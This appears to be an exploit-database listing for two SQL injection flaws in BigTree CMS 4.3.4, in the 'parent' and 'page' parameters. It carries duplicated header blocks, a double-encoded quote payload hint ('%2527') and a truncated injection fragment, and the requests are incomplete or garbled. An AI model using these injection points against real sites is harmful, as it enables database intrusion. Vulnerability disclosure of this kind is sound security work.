Bigtree 4.3.4 cms multiple sql injection Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2019-03-28 | Type : webapps | Platform : php
This exploit / vulnerability Bigtree 4.3.4 cms multiple sql injection is for educational purposes only and if it is used you will do on your own risk!

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# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
# Software Link:
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
# POC - SQLi
# Parameters : parent
# Attack Pattern :
# POST Method :
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
# Software Link:
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
# POC - SQLi
# Parameters : page
# Attack Pattern : %2527
# GET Method :
Inject Here]&sort=